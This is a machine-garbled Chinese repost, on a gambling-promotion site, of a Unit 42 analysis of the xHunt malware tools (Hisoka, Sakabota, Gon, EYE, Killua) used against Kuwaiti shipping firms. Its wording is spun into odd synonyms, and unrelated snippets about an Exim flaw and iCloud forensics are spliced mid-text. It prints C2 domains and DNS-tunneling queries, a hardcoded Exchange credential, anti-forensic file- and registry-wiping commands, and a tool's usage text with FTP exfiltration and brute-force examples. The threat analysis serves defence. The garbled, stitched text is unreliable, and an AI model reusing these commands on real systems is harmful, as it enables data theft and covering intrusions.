xHunt:针对科威特航运构造的进击行为 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

xHunt:针对科威特航运构造的进击行为

申博_新闻事件 申博 35次浏览 已收录 0个评论

CVE-2019-16928:Exim RCE破绽剖析

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统,比如Linux,Mac OSX或Solaris。占有大约互联网邮件服务器大约60%的市场份额。 9月27日,Exim维护人员发布了紧急安全更新Exim v4.92.3,修复了之前版本中存在的CVE-2019-16928漏洞。其实早在2天前,Exim就发布了关于该漏洞的警告。该漏洞影响Exim 4.92到4.92.2版本。 该漏洞是由Exim开发团队的Jeremy Harris发现的,是一个EHLO Command Hand

提要

2019年5月至6月,unit42平安团队在一起针对科威特航运业的进击事宜中,检测到了一个新后门东西——Hisoka,它的作用是下载几个的定制东西举行后破绽应用,一切东西好像都由统一个开辟职员竖立,最早的一个东西其版本能够追溯到2018年7月。

东西的称号都借用了动漫《全职猎人》中的人物名字,这也是此次行动“xHunt”称号的泉源,如后门东西Sakabota、Hisoka、Netero和Killua,它们经由历程HTTP、DNS隧道和电子邮件与C2通讯。除了上述的后门东西外,另有名为Gon和EYE的东西,供应后门接见和举行后破绽应用的才。

经由历程比较剖析,2018年7月至12月时期针对科威特的进击事宜能够也与此有关。

运动细述

2019年5月19日,科威特航运部门体系上涌现了一个名为inetinfo.sys的歹意二进制文件。inetinfo.sys是Hisoka的后门变种,在代码中注明为版本0.8。要挟行动者是如安在体系上装置歹意文件的我们还不得而知。

Hisoka接见体系的两个小时内,又有两个东西——Gon和EYE布置到了体系上,其文件名分别是Gon.sys和EYE.exe。Gon的作用是长途体系上扫描开放端口、上传下载文件、截屏、网络上查找其他体系、长途运转敕令,以及竖立长途桌面协定(RDP)会话。Gon既能够用作敕令行实用程序,也经由历程图形用户界面(GUI)挪用,如图1所示:

EYE东西则作为进击者经由历程RDP登录到体系时的毛病保险,假如正当用户登录,将杀死进击者竖立的一切历程并删除其他标识。更多关于Gon和EYE的详细信息请参考附录。

2019年6月18日至30日时期,科威特航运体系上又涌现了Hisoka的0.9版本,个中包含文件netiso.sys。6月18日,该文件经由历程服务器音讯块(SMB)协定从内部IT服务台帐户传输到另一个体系上,又以雷同体式格局传输了名为otc.dll的文件。

otc.dll文件现实上是东西Killua,它也是一个简朴的后门,能让进击者运用DNS隧道通讯,在受感染的体系上运转C2敕令。基于字符串的比较,能够确信Killua和Hisoka由统一位开辟职员竖立。Killua是我们在2019年6月初次观察到的,多是Hisoka的进化版,详情请拜见附录。

经由历程电子邮件与C2通讯

两个版本的Hisoka——v0.8和v0.9,均包含体系控制的敕令集,都能经由历程HTTP或DNS隧道与C2通讯,v0.9还增添了经由历程电子邮件与C2通讯的功用。

v0.9中增添的这项功用基于Exchange Web Services (EWS),经由历程Exchange服务器上的正当帐户与Hisoka通讯。一般来说,歹意软件登录到Exchange服务器后以发送吸收电子邮件的体式格局竖立通讯,但v0.9则是竖立邮件草稿来交流数据,如许不会检测到邮件的相差站行动。

要启用基于电子邮件的C2通道,进击者须要在敕令行上供应–E EWS <data>,后跟以下构造的数据:

<用户名>; <暗码>; <Exchange服务器的域>; <Exchange版本(2010 | 2013)>

用户名和暗码必需是Exchange服务器上的有用帐户。

Hisoka竖立邮件草稿作为吸收敕令的关照,类似于C2中的信标。邮件草稿的主题为“ Present”,邮件主体为空,“ To”字段中的电子邮件地点具有受感染体系的唯一标识符,附加后缀“ @ contoso.com”。图2显现了Hisoka竖立的邮件草稿,可经由历程Outlook Web App登录帐户检察。

 xHunt:针对科威特航运构造的进击行为

图2. Hisoka v0.9中,邮件草稿用作信标

发出敕令须要进击者登录帐户,竖立一个主题为“Project”的草稿,正文中包含了敕令,为加密字符串情势,构造为字符串<body>,下一行随着一个base64编码的密文。在C2中,这个邮件通道没有运用过的陈迹,所以应当是以HTML邮件的情势发送的,由于Hisoka会搜检邮件<body>标签以后的三行——这是经由历程搜检三个回车字符(\r)来完成,我们推想三个回车字符分别在:密文一行、</ body>标记完毕的一行和</ html>完毕的末了一行。

进击者对每一个字符异或操纵来加密敕令,并用值83(0x53)和base64对密文编码。图3显现了测试C2通道的邮件草稿,邮件通道发出敕令C-get C:\\Windows\\Temp\\test.txt后,Histoka会将其剖析为将文件上传到C:\Windows\Temp\test.txt的敕令。

 xHunt:针对科威特航运构造的进击行为

图3. Hisoka用于猎取敕令的邮件草稿

剖析并运转敕令后,Histoka竖立另一封邮件草稿将效果发送回进击者。草稿以“ Present”作为主题,体系唯一标识符和“ @ contoso.com”构造地点,音讯正文是包含敕令相应效果,加密体式格局跟上面所述雷同。

Histoka将文件附加到邮件草稿中来上传文件。图4显现了Hisoka在收到文件上传敕令后竖立的邮件草稿,test.txt是测试的上传文件。

 xHunt:针对科威特航运构造的进击行为

图4.Histoka v0.9,相应上传文件敕令的邮件草稿

虽然基于电子邮件的C2通道不是第一次在要挟运动中看到,然则运用邮件草稿和Exchange的状况照样少见的。

东西集重合

在我们剖析科威特构造中发作的歹意软件运动时,我们注意到Hisoka中的一些字符串跟之前的东西Sakabota存在肯定相似性,该样本最早是在2018年7月摆布发明的。对这两场运动剖析后我们确认,Sakabota是Hisoka的前身。

Hisoka后门东西同享了Sakabota的大批代码,函数和变量称号的数目完全雷同,表明由统一位开辟职员竖立。

 xHunt:针对科威特航运构造的进击行为

图5. Sakabota和Histoka的比较

EYE和Gon与Sakabota也有大批代码堆叠,比方EYE中的Self_Distruct要领与Sakabota的Self_Distruct要领近似,且都输出字符串“we be wait for you boss !!! ”,如图6所示;Gon和Sakabota中都嵌入了正当应用程序plink和dsquery,它们用于端口转发RDP会话并从运动目次网络信息;末了,字符串“Sakabota”也涌现在EYE和Gon的调试途径中。

虽然2018年和2019年运动中运用的歹意软件存在堆叠,但只是开辟层面的一些关联,尚不清晰这两个运动是不是由统一组职员操纵的。

与2018年运动的关联

在肯定Hisoka与Sakabota之间的关联后,我们搜刮了Sakabota的样本,发明它们的C2域均为pasta58 [.] com。此域在2018年4月至11月对科威特构造的进击事宜中也涌现过。

pasta58 [.] com相干域以下:

关联剖析

Histoka、Sakabota的基础设施与OilRig一些运动中的也存在堆叠,但这涉及到同享域解决方案,时候距离大的话,进击者能够也有变化,拜见以下关联剖析图:

结论

现在尚不清晰近两年这两波(2018年7月 – 12月、2019年5月 – 6月)针对科威特航运业的进击事宜是不是都是统一构造所为,但能够肯定的是Hisoka与Sakabota关联密切,以至与OilRig要挟团伙也有所关联。

附录

Hisoka v0.8

2019年5月至6月,我们肯定了七个Hisoka v0.8样本,都设置指向域microsofte-update[.]com,调试途径为:C:\\Users\\bob\\Desktop\\Hisoka\\Hisoka\\obj\\Debug\\inetinfo.sys.pdb。

SHA256:892d5e8e763073648dfebcfd4c89526989d909d6189826a974f17e2311de8bc4。

Hisoka是一种后门歹意软件,运用HTTP和DNS隧道与C2通讯。地点硬编码在文件中,在剖析C2域时DNS隧道会查找以下IP地点:

public static string Replay_Keyword = “245.10.10[.]11”;
 
public static string Itrupt_Keyword = “244.10.10[.]10”;
 
public static string Instruction_Keyword = “66.92.110[.]”;

上面第三个IP地点中的末了一个八位组用于Total_Package_Rows,它通知Hisoka有若干IP地点。

云端数据提取的生长进程

在iOS取证中,当无法进行物理采集时,云端数据提取确实是一种可行的替代方案。在即将发布的iOS 13版本中,苹果攻击附加了额外的安全措施,无疑将使物理访问变得更加困难。虽然下载iCloud备份的能力已经被很多人掌握了,但对于如何获取用户登录名和密码以及双因素身份验证,很多人是无法逾越这个门槛的。 早在2014年,就有研究人员介绍了如何使用身份验证令牌来访问没

从C2猎取敕令时歹意软件将构建一个构造为ID:<uniq_ID>->的字符串,并运用以下硬编码的用户代办经由历程HTTPS发送POST请求:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

然后确认字符串的第一个字符是不是为“ C”,如是则将C2的相应视为敕令。如与以下参数不婚配,则将盈余字符作为敕令运转:

Hisoka将运用DNS查询或HTTP请求将数据发送到C2服务器,详细取决于当前设置或敕令行中设置的引擎:假如设置为运用HTTP,Histoka将经由历程HTTPS发出上述的POST请求,请求的标头“ Accept-Language”中包含唯一标识符,数据在POST数据中发送。

假如C2引擎范例为“ DNS”,运用nslookup应用程序和DNS查询来剖析以下构造的域:

<唯一标识符> <已加密的base64编码数据(“ A”为24个字节,“ TXT”为64个字符).<C2位置>

在我们剖析的样本中,子域中没有包含随机值,使得两个查询能够猎取雷同的子域,可由缓存剖析。开辟者好像确切竖立了一个变量来存储随机数。然则,他们忘记在现实的子域中包含这个值。

Hisoka v0.9

2019年6月,Hisoka v0.9涌现,我们肯定了四个样本,被设置为指向google-update [.] com或learning-service [.] com。

SHA256:a78bfa251a01bf6f93b4b52b2ef0679e7f4cc8ac770bcc4fef5bb229e2e888b。

此版本删除了一些功用,并竖立了一个名为“ Netero”的新东西,新东西中包含已删除的功用。 Netero嵌入在Hisoka的msdtd资本中,在Hisoka须要运用该功用的状况下保存到体系中。将功用从Hisoka移出到另一个东西的历程表明,创作者为了回避检测,在追求一种更具模块化的体系构造。

别的Histoka v0.9还添加了基于电子邮件的C2通讯功用。

经由历程以下构造的敕令行(-E EWS <data>)供应设置:

<域\用户名>; <暗码>; <Exchange服务器的域>; <Exchange版本(2010 | 2013)>

假如花样不对,则运用以下硬编码数据:

shadow\\boss;[email protected];cas;2013

并尝试接见以下URL:

HTTPS://cas/EWS/Exchange.asmx

然后Histoka登录Exchange Server,搜检并处置惩罚电子邮件,将其用作入站通讯。为了吸收入站通讯,EWS抓取“ Drafts”文件夹(WellKnownFolderName Enum中有三个)中名为“ Project”的电子邮件线程的内的音讯。

关于出站通讯,Histoka将竖立一个主题为“Present”的电子邮件,正文中包含一条加密音讯,而且假如C2发出“文件上传”敕令,则文件将附加到电子邮件中。“收件人”字段以下:

<unique identifier>@contoso.com

Hisoka不发送电子邮件,而是将电子邮件保存在“Drafts”文件夹中。运用草稿意味着参与者能够登录到雷同的用户帐户来考证电子邮件的存在,从而进一步拓展Hisoka的通讯才。

Hisoka v0.9样本被设置指向域learning-service [.] com,并包含以下参数:

屏幕截图底部的用法详细信息表明,开辟职员对一些布置的平安性机制有肯定水平的相识。

EYE

EYE于2019年5月初次发明,此东西的目标是当正当用户登录体系时能掩饰其运动踪影,从而防止检测。与Hisoka差别的是,Hisoka看管当地登录名和RDP会话,登录到注册表以供渗入,而EYE看管这些登录名,用以杀死历程,还删除参与者会话时期竖立的注册表项和文件。

当运转EYE时,它会请求用户在“Log off mode”设置中输入“ y”(是)或“ n”(否)。

Choose -> Log off Mode  ? :
 
[y]
 
[n]

不管用户输入什么,EYE都将最先看管当地启动或由长途RDP会话启动的入站登录。它将起首显现版本号“ v0.1”,然后是ASCII码构成的新鲜图形,以后向控制台写入音讯,指导它最先看管入站登录尝试,然后是自实行EYE东西以来竖立的历程列表。图12显现了我们测试中EYE东西的输出,个中显现了运转EYE后,直到发作当地登录之前竖立的几个历程(calc,SnippingTool等)。

 
                                      v0.1
                                 ??
                               ? ?
                               ??? ?
                               ?????      ?
                                 ????? ? ???     ?
                                  ????? ???? ?  ??
                                  ?????? ??? ????
                               ? ?????????? ????  ?
                              ??????????????????????
                              ????????????????????
                              ?????????????????? ?
                           ????????????????????????
                       ???   ????????????????????? ???                    ??
                   ???         ??????????????????      ???                ??
                ??               ??????????                ??            ??
              ??                ???????????                  ??          ??
            ?                   ???     ????                    ?       ??
          ??                    ????? ?????                      ??    ???
         ?                       ???    ???                        ?   ??
        ?                       ? ????????                         ??????
       ?                  ??????? ???????? ?????                   ????????
      ?               ?????????? ????????? ???? ????               ????
     ?               ?????????? ??????????? ??????????           ???????
                   ???????????? ??????????? ???????????         ????????
    ?              ???????????  ??????????? ????????????????? ???????????
                   ???????????? ??????????? ????????? ???? ?     ??????
                  ????????????? ??????????? ????????? ??? ???    ????
                  ?????????????? ????????? ?????????  ??? ??  ??????
    ?             ??????????????? ??????? ????????????????? ????????    ?
    ?            ??????????????????  ?  ????????????????????????????    ?
                ??????????????????????????????????????? ?? ??? ?????   ?
                ??????????????????????????????????????  ?????? ?? ??   ?
      ?       ??????????????????????????????????? ??????????? ??      ?
       ?     ?????????????????????????????????????????????   ??      ?
        ?     ???????? ??????????????????????    ????????   ??      ?
          ?   ?????   ???????? ????? ???  ??       ?????   ??     ?
           ?? ??????    ????   ?? ??? ???         ??????????     ?
            ???????????            ?    ?        ??????????   ??
           ?????????????????????    ?          ???????????????
          ???????????????????????? ???         ??????????????
          ????????????????????????????  ??????????????????????
           ???????????????????????????????????????????????????
            ????????????????????? ????????????????????????????
              ????????????????              ?????????????????
                                                    ??
 
 
Start Watching Without LOG_OFF Mode...
iexplore<3408>
iexplore<2088>
cmd<2280>
conhost<1056>
calc<3664>
SnippingTool<3024>
wisptis<768>
SoundRecorder<2996>
control<1292>
rundll32<2436>
dllhost<3996>
dllhost<1096>
TSTheme<3900>
cmd<1884>
we be wait for you boss !!!
TPAutoConnect<2912>
conhost<2376>
cmd<1200>
conhost<2536>
taskkill<3336>

当尝试举行当地或RDP登录时,EYE会向控制台写入字符串“we be wait for you boss !!!”,然后才最先清算陈迹,杀死自EYE启动以来竖立的一切历程, 然后,EYE将经由历程运转以下敕令删除运用跳转列表竖立的一切最新文档和文件:

Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\* & Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\* & Del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*

EYE还将删除在以下注册表项中找到的一切值以及用户文件夹中的“ Default.rdp”文件:

Software\\Microsoft\\Terminal Server Client\\Default
 
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WordWheelQuery
 
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TYPEDPATHS
 
Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU

EYE删除本身:

taskkill /f /im <EYE’s executable filename> & choice /C Y /N /D Y /T 3 & Del “<path to EYE’s executable>”

EYE确切包含一些风趣的构件,比方从未运用或挪用过的“ExecuteCommand”要领。此要领的存在表明,它要么是前一个版本的遗留代码,要么是此东西所基于的另一个代码基的构件。我们置信EYE是用Hisoka和Sakabota的代码竖立的,由于要领名和变量名有显著的堆叠,PDB调试途径中也有对Sakabota的援用:

Z:\TOOLS\Sakabota_Tools\Utility\Micosoft_Visual_Studio_2010_Experss\PRJT\Sync\Sakabota\EYE\EYE\obj\Release\EYE.pdb

Gon

Gon东西也于2019年5月初次观察到,包含了多种功用,它能够用于后破绽应用阶段。

Gon具有扫描长途体系上开放端口、上传和下载文件、截屏、查找网络上的其他体系、运用WMI或PSEXEC在长途体系上运转敕令,以及运用plink实用程序竖立RDP会话的功用。Gon能够作为敕令行实用程序运用,也能够运用GUI作为桌面应用程序。在GUI状况下, Gon能够运用嵌入个中的“dsquery”东西发出以下敕令,从active directory猎取计算机、用户和组名:

DS.exe computer -limit 0 > computer_DS.txt
 
DS.exe user -limit 0 > Users_DS.txt
 
DS.exe group -limit 0 > Group_DS.txt

当运用敕令行时,能够很容易地看到Gon的“-help”敕令下的运用:

 
 ___v0.2_               
               /  _____/  ____   ____  
              /   \  ___ /  _ \ /    \
              \    \_\  (  <_> )   |  \
               \______  /\____/|___|  /
                      \/            \/  
 
-Up[-l Path.txt] FOLDER_OR_FILE -C Host;User;Pass [-KWF](kill when Finish) [-DEL](delete when item upload)
[+] is ftp upload 1_ex=-up my_folder_or_File -KWF -DEL -C server.com;admin;123
2_ex=-up-l my_Path.txt -C server.com;admin;123
 
-Screen[-up][-s count,seconds] -C Host;User;Pass
[+] Print Screen -up is upload to ftp and delete the file. -s will repate and will upload -C Cerdential For Upload via FTP
 
-Remote [-P] [Host;user;pass;Wdir] [Code]
[+] wmic to host;user;-P is psexecmode ,pass and save it in Wdir\Thumb.dll
 
-Download[-s] URL
[+] http://www.URL , is -s Https will download in same directory
 
-Scan[-v IP-To][-l Path.txt] [setp] [-A]
[+] Result will be in P.txt,-A is advanced scan but slower, step is number to bruteforce MAX 230 -> ex = -Scan-v 192.168.?.? 8
 
-Bruter Path.txt username;pass{?} [+][-]
[+] Result will be in N.txt , [+] Write netuse IP,[-] Write nont-netuse IP, Tip = Username & Password can be read from file
 
-Rev[-clean][-loop] [V_ip] [port_to_Exit] [server;port]
[+] RDP Revers on loop on every 10 min and with SYSTEM
 
-Globe[-v p,o-r,t,s] [server]
[+] Scan Global Port 123,443,80,81,23,21,22,20,110,25, v is Custom port
 
-Done
[+] self Distruct

用户输入暗码“ 92”才运用GUI,以后显现《全职猎人》的Gon和Killua角色的图象。

GUI包含与敕令行选项雷同的功用,但还包含启用“个人运用”的按钮。假如用户在GUI中80秒内没有光标(800毫秒的计时器距离,搜检100次),则该计时器将隐蔽Gon GUI窗口。

运用扫描功用时,Gon会将效果写入<事情目次> \ wnix \ Scan_Result.txt中,其内容以下:

172.16.107[.]140[WIN-<redacted>] –> SMB
 
**************Sakabota_v0.2.0.0*****2019-06-14|#|13:32**************

Gon和Sakabota / Hisoka之间也存在大批代码堆叠,表明是统一位职员开辟。

Killua

Killua很多是由Hisoka的作者竖立的。Killua的功用类似于Hisoka,但与Hisoka是用C#开辟的,而它是用Visual C ++编写的。Killua样本直到2019年6月25日至30日才举行编译,好像比已知的Hisoka样本要新。类似于Hisoka,Killua运用以下注册表项将其设置写入注册表:

HKCU\Control Panel\International\_ID: <unique identifier>
 
HKCU\Control Panel\International\_EndPoint: “learn-service[.]com”
 
HKCU\Control Panel\International\_Resolver_Server: ” “
 
HKCU\Control Panel\International\_Response: “180”
 
HKCU\Control Panel\International\_Step: “3”

Killua运用DNS隧道与C2服务器通讯,而且只能运用内置的“ nslookup”东西将DNS查询用于隧道,这与发送Hisoka的要领雷同。Killua运用体系的唯一标识符作为子域的初始信标。在剖析历程当中,我们观察到唯一的标识符“EVcmmi”,base64将其解码为“Result goes here”。此操纵将天生一个信标,查询以下域:

EVcmmi.learn-service[.]com

DNS服务器的相应为“66.92.110[.]4”,个中前三个八位组关照Killua最先发送其他查询,以便从C2 DNS服务器吸收敕令。它将在IPv4的查询答案中发送这些敕令,第四个八位组用于肯定须要发出若干DNS查询,以便从C2服务器吸收悉数数据。

“ 66.92.110 [.] 4”则申明Killua发出4个查询,在C2 DNS服务器供应的答案中吸收4个IPv4地点。

由DNS服务器发出的四个DNS查询以唯一标识符“ EVcmmi”开首,然后是base64编码的数据,以下所示:

EVcmmiYg==.learn-service[.]com
 
EVcmmiYA==.learn-service[.]com
 
EVcmmiYQ==.learn-service[.]com
 
EVcmmiZw==.learn-service[.]com

一最先我们以为包含等号“ =”的子域将没法剖析,但厥后我们相识到DNS服务器将相应具有包含非标准字符标签的域的查询。在对数据举行base64编码之前,Killua经由历程对每一个字符与83(0x53)举行XOR加密,从而对明文举行了加密,效果以下:

“ Yg ==”为1
 
“ YA ==”为3
 
“ YQ ==”为2
 
“ Zw ==”为4

上面解密的数字是用于猎取C2服务器请求的数据块的序列号,C2服务器运用以下IPv4地点相应了这些查询:

69.67.1[.]81
 
73.43.3[.]79
 
55.80.2[.]68
 
103.61.4[.]61

第三个八位组包含序列号,而其他八位组包含Killua将放入准确序列并作为数据处置惩罚的数据。 假如我们将IP地点根据第三个八位以准确的顺序排列,并将其他三个八位按字符处置惩罚,我们获得:

69.67.1[.]81 is “ECQ”
 
55.80.2[.]68 is “7PD”
 
73.43.3[.]79 is “I+O”
 
103.61.4[.]61 is “g==”

经由历程解码base64字符串并将每一个字节与0x53举行XOR来解密,我们能够看到C2服务器发出敕令“ C”,后接“ whoami”:

>>> out = “”
 
>>> for c in base64.b64decode(“ECQ7PDI+Og==”):
 
…  out += chr(ord(c)^0x53)
 
…
 
>>> out
 
‘Cwhoami’

敕令“ C”与Hisoka吸收敕令时运用的字符雷同。假如紧接在“ C”以后的字符不是连字符(“-”),那末Killua将经由历程运用“ cmd / c”挪用CreateProcessW,并将数据附加到该字符串后,以敕令的情势实行数据;不然Killua将搜检供应的敕令,类似于以下敕令:

–R
 
-doer
 
-S
 
-status
 
-change
 
-id
 
-resolver
 
-help

“ -help”申清楚明了用处:

+-+-+-+Killua-+-+-+-+
 
-change [HOST.com]  ****** Change endPoint
 
-doer ;[command] ****** Executer
 
-status  ****** info
 
-resolver [8.8.8.8]  ****** Resolver
 
-R[num]s  ****** Response
 
-P[num]  ****** packect
 
-id [SIXLTR]  ****** ID

 xHunt:针对科威特航运构造的进击行为

表2. Sakabota和Histoka域的基础设施

本文翻译自:https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明xHunt:针对科威特航运构造的进击行为
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址